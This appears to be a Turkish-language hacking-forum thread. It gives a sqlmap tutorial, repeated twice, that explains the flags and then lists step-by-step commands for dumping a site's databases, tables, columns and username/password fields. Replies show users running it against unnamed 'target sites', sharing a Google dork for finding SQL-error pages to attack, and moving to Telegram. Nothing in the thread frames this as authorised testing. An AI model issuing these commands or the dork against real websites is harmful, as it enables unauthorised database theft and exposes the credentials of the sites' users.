Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
[/COLOR]
--risk : 1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır. Risk 1 daha sınırlı sql cümleleri ile denetleme yapar. Risk 2'de risk 1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur. Risk 3'te ise ekstradan Or-based testler de eklenir.
--level : 1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetlenmektedir.
--random-agent : Testlerimizde kullanacağımı User-Agent değerinin, sqlmap ile hazır gelen user-agent değerlerinin bulunduğu dosya içeriisnden random olarak atanması için kullanabileceğimiz parametremiz.
--user-agent : Testlerimizde kullanacağımız User-Agent değerini kendimiz belirlemek için kullanabileceğimiz komutumuz.
-v : Default olarak 1 tanımlı gelen ve sqlmap çalıştığı süre zarfında bize gösterdiği çıktıların gösterimini belirlediğimiz verbose komutumuz. 0 ile 6 arasında değişmekte. 0 en az çıktıyı döndürürken, 6 en çok çıktı ile sonuçları döndürmekte.
--batch : Sqlmap'in input gerektiren bazı durumlarında, kullanıcı inputunu istemeden, sqlmap tarafından tanımlı default değerlere göre devam etmesini sağlayan parametremiz
--threads : Multi-threading ile sqlmap'in maximum kaç tane HTTP(s) isteği yapabileceğini belirlemek için kullanabileceğimiz parametremiz. Özellikle bruteforce searching işlemlerinde, aramamızı oldukça hızlandıran bu yöntem, performans sebepleri gerekçesiyle max. 10 thread kullanılması tavsiye edilmekte.
VERİTABANINI DAHA KOLAY ÇEKMEK İÇİN
1-)C:// Dizinine Gidelim...
KOD:
cd..
cd..
2-) C:// Dizininde SQLMAP'i Çalıştıralım...
KOD: cd sqlmap
3-)Veritabanını Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
4-)Tabloları Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 veritabanıadı --tables
5-)Kolonları Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x"* --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı --columns
6-)Verileri Çekelim...
KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı -C kullanıcıadı,şifre --dump
[COLOR=rgb(97, 189, 109)]Dbs i çekerken başına sadece python2 yazıyorum tek fark oalıntıdır.
[/COLOR] --risk : 1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır. Risk 1 daha sınırlı sql cümleleri ile denetleme yapar. Risk 2'de risk 1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur. Risk 3'te ise ekstradan Or-based testler de eklenir. --level : 1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetlenmektedir. --random-agent : Testlerimizde kullanacağımı User-Agent değerinin, sqlmap ile hazır gelen user-agent değerlerinin bulunduğu dosya içeriisnden random olarak atanması için kullanabileceğimiz parametremiz. --user-agent : Testlerimizde kullanacağımız User-Agent değerini kendimiz belirlemek için kullanabileceğimiz komutumuz. -v : Default olarak 1 tanımlı gelen ve sqlmap çalıştığı süre zarfında bize gösterdiği çıktıların gösterimini belirlediğimiz verbose komutumuz. 0 ile 6 arasında değişmekte. 0 en az çıktıyı döndürürken, 6 en çok çıktı ile sonuçları döndürmekte. --batch : Sqlmap'in input gerektiren bazı durumlarında, kullanıcı inputunu istemeden, sqlmap tarafından tanımlı default değerlere göre devam etmesini sağlayan parametremiz --threads : Multi-threading ile sqlmap'in maximum kaç tane HTTP(s) isteği yapabileceğini belirlemek için kullanabileceğimiz parametremiz. Özellikle bruteforce searching işlemlerinde, aramamızı oldukça hızlandıran bu yöntem, performans sebepleri gerekçesiyle max. 10 thread kullanılması tavsiye edilmekte. VERİTABANINI DAHA KOLAY ÇEKMEK İÇİN 1-)C:// Dizinine Gidelim... KOD: cd.. cd.. 2-) C:// Dizininde SQLMAP'i Çalıştıralım... KOD: cd sqlmap 3-)Veritabanını Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs 4-)Tabloları Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 veritabanıadı --tables 5-)Kolonları Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x"* --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı --columns 6-)Verileri Çekelim... KOD: sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı -C kullanıcıadı,şifre --dump [COLOR=rgb(97, 189, 109)]
işlemlerinizi sqlmap üzerinden yapmıyor musunuz?Dbs i çekerken başına sadece python2 yazıyorum tek fark o
Problem ordan mi kaynaklanıyor acaba
Evet sqlmap üzerinden kullandığım kod bu : python2 sqlmap.py -u "hedef site" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsişlemlerinizi sqlmap üzerinden yapmıyor musunuz?
bana telegram üzerinden yazar mısınız? post kasmayalım burada.Evet sqlmap üzerinden kullandığım kod bu : python2 sqlmap.py -u "hedef site" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
Tabi olur isminiz nedirbana telegram üzerinden yazar mısınız? post kasmayalım burada.
benım bıldıgım kalı lınux sanal makınesınden sqlmap -h yapıp bılgı alabılırsınız ayrıca genellıkle --random-agent --dbs yazılır ve ılk tarama boyle yapılırDbs i çekerken başına sadece python2 yazıyorum tek fark o
Problem ordan mi kaynaklanıyor acaba
Ben termux ile yapıyorum onun için de geçerlimidirbenım bıldıgım kalı lınux sanal makınesınden sqlmap -h yapıp bılgı alabılırsınız ayrıca genellıkle --random-agent --dbs yazılır ve ılk tarama boyle yapılır
Net bir süre vermek mümkün değil. Burada ki durum internet hızına göre ve siteye bağlı etmenlere göre değişebilir.Dostlar ben sql açıklı bir sitenin database'si ni çekerken bu işlem saatlerce sürebiliyor bu normal mi, değil ise ne kadar sürmesi gerekiyor
Bu işte yeniyim özür diliyerek soruyorum bunun minimum süresi vs yokmu çünkü 4 saatten aşağı sürmüyorNet bir süre vermek mümkün değil. Burada ki durum internet hızına göre ve siteye bağlı etmenlere göre değişebilir.
Sqlmap konusunda uzman olmadığımdan net bir şey diyemem ancakinurlhp?id= intext:”you have an error in your sql syntax” site: kullandığım dork bu özellikle bu dork ile bulduğum sitelerin dbs ini çekerken saatlerce bekliyorum çoğu zaman sıkılıp kapatıyorum
tarzı parametrelerin kullanımından dolayı olduğunu düşünüyorum. Bunlar daha çeşitli yöntemler denediğinden normalden de uzun sürüyor olması lazım.--risk=3 --level=5
Cevaplarınız için teşekkür ederim bana çok yardımcı oldunuzSqlmap konusunda uzman olmadığımdan net bir şey diyemem ancak
tarzı parametrelerin kullanımından dolayı olduğunu düşünüyorum. Bunlar daha çeşitli yöntemler denediğinden normalden de uzun sürüyor olması lazım.